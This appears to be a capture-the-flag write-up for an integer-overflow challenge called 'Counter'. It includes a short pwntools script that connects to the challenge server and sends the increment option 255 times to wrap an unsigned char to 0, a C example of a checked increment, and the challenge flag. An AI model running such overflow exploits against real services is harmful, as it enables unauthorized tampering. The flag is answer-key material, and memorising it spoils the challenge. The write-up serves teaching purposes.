Counter

Description

I heard that adding numbers in C is very tricky, can you prove that to me with this challenge?

Steps

Analyzing the counter.c file, we can see that the counter is declared as an unsigned char, which is vulnerable to an integer overflow: the type only holds values from 0 to 255, so incrementing it past 255 wraps it back around.

Solution

We just need to call the increment code path 255 times to wrap the integer around to 0.

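from pwn import *

# target = process("./counter")  # uncomment to test against a local binary
target = remote("pwn.chal.ctf.gdgalgiers.com", 1402)

# Send choice 1 (the increment) 255 times so the unsigned char wraps to 0.
# pwntools expects bytes on Python 3, hence the b"" literals.
for i in range(0, 255):
    print(target.recvuntil(b"Choice: ").decode())
    target.sendline(b"1")
target.interactive()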
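The wraparound the script relies on, next to a checked increment that rejects it. This is an added example, not the challenge's counter.c: the function names and the starting value of 1 are assumptions chosen so that 255 increments land on 0, as in the solution above.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical stand-in for the challenge's counter: an 8-bit unsigned value.
   Unsigned arithmetic in C is modular, so UCHAR_MAX + 1 becomes 0. */
typedef unsigned char counter_t;

/* Unchecked increment, the behaviour the write-up describes: silently wraps. */
static counter_t increment_wrapping(counter_t c)
{
    return (counter_t)(c + 1);
}

/* Hardened increment: refuses to step past UCHAR_MAX and reports failure. */
static bool increment_checked(counter_t *c)
{
    if (*c == UCHAR_MAX)
        return false;
    *c = (counter_t)(*c + 1);
    return true;
}

/* Apply n unchecked increments starting at `start`. */
static counter_t run_wrapping(counter_t start, unsigned n)
{
    counter_t c = start;
    for (unsigned i = 0; i < n; i++)
        c = increment_wrapping(c);
    return c;
}

/* Apply up to n checked increments; returns how many were accepted. */
static unsigned run_checked(counter_t *c, unsigned n)
{
    unsigned accepted = 0;
    while (accepted < n && increment_checked(c))
        accepted++;
    return accepted;
}

int main(void)
{
    counter_t hardened = 1; /* assumed starting value */
    unsigned ok = run_checked(&hardened, 255);
    printf("wrapping: 1 + 255 increments -> %u\n", (unsigned)run_wrapping(1, 255));
    printf("checked:  %u increments accepted, counter = %u\n", ok, (unsigned)hardened);
    return 0;
}
```

With the checked version the counter stops at 255 and the final increment is refused, so a value of 0 can no longer be reached by counting upward.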

Flag

CyberErudites{1NtegeR_0v3rfloWS_ar3_Na$ty}

This post is licensed under CC BY 4.0 by the author.